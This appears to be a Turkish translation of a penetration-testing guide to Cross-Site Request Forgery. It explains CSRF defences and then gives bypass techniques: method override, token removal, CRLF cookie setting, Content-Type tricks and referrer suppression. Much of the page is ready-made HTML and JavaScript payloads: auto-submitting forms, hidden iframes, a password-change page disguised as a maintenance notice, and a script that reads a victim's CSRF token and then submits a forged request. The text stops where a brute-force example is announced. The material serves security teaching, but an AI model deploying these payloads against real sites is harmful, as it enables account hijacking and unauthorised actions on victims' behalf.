Deneyimli hackerlar ve bug bounty avcıları ile iletişim kurmak için HackenProof Discord sunucusuna katılın!
Hacking İçgörüleri
Hacking'in heyecanı ve zorluklarına dalan içeriklerle etkileşimde bulunun
Gerçek Zamanlı Hack Haberleri
Hızla değişen hacking dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın
Son Duyurular
Yeni başlayan bug bounty'ler ve kritik platform güncellemeleri hakkında bilgi sahibi olun
Bugün Discord üzerinden bize katılın ve en iyi hackerlarla işbirliği yapmaya başlayın!
Cross-Site Request Forgery (CSRF) Açıklaması
Cross-Site Request Forgery (CSRF), web uygulamalarında bulunan bir güvenlik açığı türüdür. Bu, saldırganların, kimlik doğrulaması yapılmış oturumları istismar ederek, habersiz kullanıcılar adına eylemler gerçekleştirmesine olanak tanır. Saldırı, bir kullanıcının, bir kurbanın platformuna giriş yaptıktan sonra kötü niyetli bir siteyi ziyaret etmesiyle gerçekleştirilir. Bu site, JavaScript çalıştırma, formları gönderme veya resimleri alma gibi yöntemlerle kurbanın hesabına istekler tetikler.
CSRF Saldırısı için Ön Koşullar
CSRF açığını istismar etmek için birkaç koşulun sağlanması gerekir:
Değerli Bir Eylemi Belirleme: Saldırgan, kullanıcının şifresini, e-posta adresini değiştirmek veya yetkileri yükseltmek gibi istismar etmeye değer bir eylem bulmalıdır.
Oturum Yönetimi: Kullanıcının oturumu yalnızca çerezler veya HTTP Temel Kimlik Doğrulama başlığı aracılığıyla yönetilmelidir, çünkü diğer başlıklar bu amaçla manipüle edilemez.
Tahmin Edilemez Parametrelerin Yokluğu: İstek, tahmin edilemez parametreler içermemelidir, çünkü bunlar saldırıyı engelleyebilir.
Hızlı Kontrol
İsteği Burp'ta yakalayabilir ve CSRF korumalarını kontrol edebilir, tarayıcıdan test etmek için Fetch olarak Kopyala seçeneğine tıklayarak isteği kontrol edebilirsiniz:
CSRF'ye Karşı Savunma
CSRF saldırılarına karşı korunmak için birkaç önlem uygulanabilir:
Kullanıcı Doğrulaması: Kullanıcının şifresini istemek veya bir captcha çözmek, kullanıcının niyetini doğrulayabilir.
Referans veya Kaynak Başlıklarını Kontrol Etme: Bu başlıkların doğrulanması, isteklerin güvenilir kaynaklardan geldiğinden emin olmaya yardımcı olabilir. Ancak, URL'lerin dikkatlice oluşturulması, kötü uygulanmış kontrolleri atlatabilir, örneğin:
http://mal.net?orig=http://example.com kullanmak (URL güvenilir URL ile bitiyor)
http://example.com.mal.net kullanmak (URL güvenilir URL ile başlıyor)
Parametre İsimlerini Değiştirme: POST veya GET isteklerindeki parametre isimlerini değiştirmek, otomatik saldırıları önlemeye yardımcı olabilir.
CSRF Token'ları: Her oturumda benzersiz bir CSRF token'ı eklemek ve bu token'ı sonraki isteklere zorunlu kılmak, CSRF riskini önemli ölçüde azaltabilir. Token'ın etkinliği, CORS'un zorunlu kılınmasıyla artırılabilir.
Bu savunmaları anlamak ve uygulamak, web uygulamalarının güvenliğini ve bütünlüğünü korumak için kritik öneme sahiptir.
Savunma Atlatma
POST'tan GET'e
Kötüye kullanmak istediğiniz form, CSRF token'ı ile bir POST isteği göndermek üzere hazırlanmış olabilir, ancak bir GET isteğinin de geçerli olup olmadığını kontrol etmelisiniz ve GET isteği gönderdiğinizde CSRF token'ının hala doğrulandığını kontrol etmelisiniz.
Token Eksikliği
Uygulamalar, token'lar mevcut olduğunda token'ları doğrulamak için bir mekanizma uygulayabilir. Ancak, token yokken doğrulamanın tamamen atlanması durumunda bir güvenlik açığı ortaya çıkar. Saldırganlar, token'ı taşıyan parametreyi kaldırarak bunu istismar edebilir, sadece değerini değil. Bu, doğrulama sürecini atlatmalarına ve etkili bir Cross-Site Request Forgery (CSRF) saldırısı gerçekleştirmelerine olanak tanır.
CSRF token'ı kullanıcı oturumuna bağlı değil
Uygulamalar CSRF token'larını kullanıcı oturumlarına bağlamıyorsa, bu önemli bir güvenlik riski oluşturur. Bu sistemler, her token'ın başlatan oturumla bağlı olmasını sağlamak yerine, token'ları küresel bir havuz ile doğrular.
Saldırganların bunu nasıl istismar ettiğine dair:
Kendi hesaplarıyla kimlik doğrulama yaparlar.
Küresel havuzdan geçerli bir CSRF token'ı alırlar.
Bu token'ı bir kurbana karşı CSRF saldırısında kullanırlar.
Bu güvenlik açığı, saldırganların kurban adına yetkisiz istekler yapmasına olanak tanır ve uygulamanın yetersiz token doğrulama mekanizmasını istismar eder.
Yöntem atlatma
Eğer istek "garip" bir yöntem kullanıyorsa, yöntemaşırı yazma işlevinin çalışıp çalışmadığını kontrol edin. Örneğin, eğer PUT yöntemi kullanıyorsa, POST yöntemini kullanmayı deneyebilir ve şunu gönderebilirsiniz: https://example.com/my/dear/api/val/num?_method=PUT
Bu, POST isteği içinde _method parametresini göndererek veya başlıkları kullanarak da çalışabilir:
X-HTTP-Method
X-HTTP-Method-Override
X-Method-Override
Özel başlık token atlatma
Eğer istek, CSRF koruma yöntemi olarak isteğe bir token ile özel başlık ekliyorsa, o zaman:
Özelleştirilmiş Token ve başlık olmadan isteği test edin.
Tam aynı uzunlukta ama farklı bir token ile isteği test edin.
CSRF token'ı bir çerezle doğrulanıyor
Uygulamalar, token'ı hem bir çerezde hem de bir istek parametresinde kopyalayarak veya bir CSRF çerezi ayarlayarak ve arka uçta gönderilen token'ın çerezle eşleşip eşleşmediğini doğrulayarak CSRF koruması uygulayabilir. Uygulama, istek parametresindeki token'ın çerezdeki değerle uyumlu olup olmadığını kontrol ederek istekleri doğrular.
Ancak, bu yöntem, bir saldırganın kurbanın tarayıcısında bir CSRF çerezi ayarlamasına izin veren hatalar varsa CSRF saldırılarına karşı savunmasızdır, örneğin bir CRLF açığı. Saldırgan, çerezi ayarlayan yanıltıcı bir resmi yükleyerek bunu istismar edebilir ve ardından CSRF saldırısını başlatabilir.
Aşağıda bir saldırının nasıl yapılandırılabileceğine dair bir örnek verilmiştir:
<html><!-- CSRF Proof of Concept - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formaction="https://example.com/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="hidden"name="csrf"value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" /><inputtype="submit"value="Submit request" /></form><imgsrc="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E"onerror="document.forms[0].submit();"/></body></html>
csrf token'ın oturum çerezi ile ilişkili olması durumunda bu saldırı çalışmayacaktır çünkü kurbanın oturumunu ayarlamanız gerekecek ve dolayısıyla kendinizi hedef almış olacaksınız.
Content-Type değişikliği
şuna göre, POST yöntemini kullanarak ön uç isteklerini önlemek için izin verilen Content-Type değerleri şunlardır:
application/x-www-form-urlencoded
multipart/form-data
text/plain
Ancak, kullanılan Content-Type'a bağlı olarak sunucu mantığının değişebileceğini unutmayın, bu nedenle belirtilen değerleri ve application/json, text/xml, application/xml gibi diğerlerini denemelisiniz.
JSON verisini text/plain olarak gönderme örneği ( buradan):
POST isteği aracılığıyla JSON verisi göndermeye çalışırken, bir HTML formunda Content-Type: application/json kullanmak doğrudan mümkün değildir. Benzer şekilde, bu içerik türünü göndermek için XMLHttpRequest kullanmak bir ön uç isteği başlatır. Yine de, bu sınırlamayı aşmanın ve sunucunun JSON verilerini Content-Type'a bakılmaksızın işleyip işlemediğini kontrol etmenin stratejileri vardır:
Alternatif İçerik Türlerini Kullanma: Formda enctype="text/plain" ayarlayarak Content-Type: text/plain veya Content-Type: application/x-www-form-urlencoded kullanın. Bu yaklaşım, arka ucun içerik türüne bakılmaksızın veriyi kullanıp kullanmadığını test eder.
İçerik Türünü Değiştirme: Sunucunun içeriği JSON olarak tanımasını sağlarken ön uç isteğinden kaçınmak için veriyi Content-Type: text/plain; application/json ile gönderebilirsiniz. Bu, bir ön uç isteği tetiklemez ancak sunucu application/json kabul edecek şekilde yapılandırılmışsa doğru bir şekilde işlenebilir.
SWF Flash Dosyası Kullanımı: Daha az yaygın ama uygulanabilir bir yöntem, bu tür kısıtlamaları aşmak için bir SWF flash dosyası kullanmaktır. Bu tekniği derinlemesine anlamak için bu gönderiye bakın.
Referrer / Origin kontrolünü aşma
Referrer başlığından kaçının
Uygulamalar, 'Referer' başlığı yalnızca mevcut olduğunda doğrulama yapabilir. Bir tarayıcının bu başlığı göndermesini önlemek için aşağıdaki HTML meta etiketi kullanılabilir:
<metaname="referrer"content="never">
Bu, 'Referer' başlığının hariç tutulmasını sağlar ve bazı uygulamalardaki doğrulama kontrollerinin atlanmasına neden olabilir.
Referrer'ın parametreler içinde göndereceği URL'deki sunucunun alan adını ayarlamak için şunları yapabilirsiniz:
<html><!-- Referrer policy needed to send the qury parameter in the referrer --><head><metaname="referrer"content="unsafe-url"></head><body><script>history.pushState('','','/')</script><formaction="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="submit"value="Submit request" /></form><script>// You need to set this or the domain won't appear in the query of the referer headerhistory.pushState("","","?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")document.forms[0].submit();</script></body></html>
HEAD yöntemi atlatma
Bu CTF yazısı kısmında, Oak'ın kaynak kodu ile bir yönlendiricinin HEAD isteklerini GET istekleri olarak yanıt gövdesi olmadan işlemek üzere ayarlandığı açıklanmaktadır - bu, Oak'a özgü olmayan yaygın bir geçici çözümdür. HEAD istekleriyle ilgilenen belirli bir işleyici yerine, bunlar basitçe GET işleyicisine verilir, ancak uygulama yanıt gövdesini kaldırır.
Bu nedenle, bir GET isteği sınırlıysa, GET isteği olarak işlenecek bir HEAD isteği gönderebilirsiniz.
Sömürü Örnekleri
CSRF Token'ı Sızdırma
Eğer bir CSRF token'ısavunma olarak kullanılıyorsa, bir XSS açığını veya bir Dangling Markup açığını kullanarak sızdırmayı deneyebilirsiniz.
HTML etiketleri kullanarak GET
<imgsrc="http://google.es?param=VALUE"style="display:none" /><h1>404 - Page not found</h1>The URL you are requesting is no longer available
Diğer HTML5 etiketleri, otomatik olarak bir GET isteği göndermek için kullanılabilir:
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formmethod="GET"action="https://victim.net/email/change-email"><inputtype="hidden"name="email"value="some@email.com" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Form POST isteği
<html><body><script>history.pushState('','','/')</script><formmethod="POST"action="https://victim.net/email/change-email"id="csrfform"><inputtype="hidden"name="email"value="some@email.com"autofocusonfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit --><inputtype="submit"value="Submit request" /><imgsrc=xonerror="csrfform.submit();" /> <!-- Way 2 to autosubmit --></form><script>document.forms[0].submit(); //Way 3 to autosubmit</script></body></html>
Form POST isteği iframe aracılığıyla
<!--The request is sent through the iframe withuot reloading the page--><html><body><iframestyle="display:none"name="csrfframe"></iframe><formmethod="POST"action="/change-email"id="csrfform"target="csrfframe"><inputtype="hidden"name="email"value="some@email.com"autofocusonfocus="csrfform.submit();" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Ajax POST isteği
<script>var xh;if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safarixh=newXMLHttpRequest();}else{// code for IE6, IE5xh=newActiveXObject("Microsoft.XMLHTTP");}xh.withCredentials =true;xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");xh.setRequestHeader('Content-type','application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)xh.send("username=abcd&status=on");</script><script>//JQuery version$.ajax({type:"POST",url:"https://google.com",data:"param=value¶m2=value2"})</script>
<--! expl.html --><bodyonload="envia()"><formmethod="POST"id="formulario"action="http://aplicacion.example.com/cambia_pwd.php"><inputtype="text"id="pwd"name="pwd"value="otra nueva"></form><body><script>functionenvia(){document.getElementById("formulario").submit();}</script><!-- public.html --><iframesrc="2-1.html"style="position:absolute;top:-5000"></iframe><h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
CSRF Token'ı Çal ve POST isteği gönder
functionsubmitFormWithTokenJS(token) {var xhr =newXMLHttpRequest();xhr.open("POST",POST_URL,true);xhr.withCredentials =true;// Send the proper header information along with the requestxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");// This is for debugging and can be removedxhr.onreadystatechange=function() {if(xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {//console.log(xhr.responseText);}}xhr.send("token="+ token +"&otherparama=heyyyy");}functiongetTokenJS() {var xhr =newXMLHttpRequest();// This tels it to return it as a HTML documentxhr.responseType ="document";xhr.withCredentials =true;// true on the end of here makes the call asynchronousxhr.open("GET",GET_URL,true);xhr.onload=function (e) {if (xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {// Get the document from the responsepage =xhr.response// Get the input elementinput =page.getElementById("token");// Show the token//console.log("The token is: " + input.value);// Use the token to submit the formsubmitFormWithTokenJS(input.value);}};// Make the requestxhr.send(null);}varGET_URL="http://google.com?param=VALUE"varPOST_URL="http://google.com?param=VALUE"getTokenJS();
CSRF Token'ı çal ve bir iframe, bir form ve Ajax kullanarak bir Post isteği gönder
Kod, bir CSRF token kullanarak bir giriş formunu Kaba Kuvvet ile kırmak için kullanılabilir (Ayrıca, olası bir IP kara listesini aşmaya çalışmak için X-Forwarded-For başlığını da kullanıyor):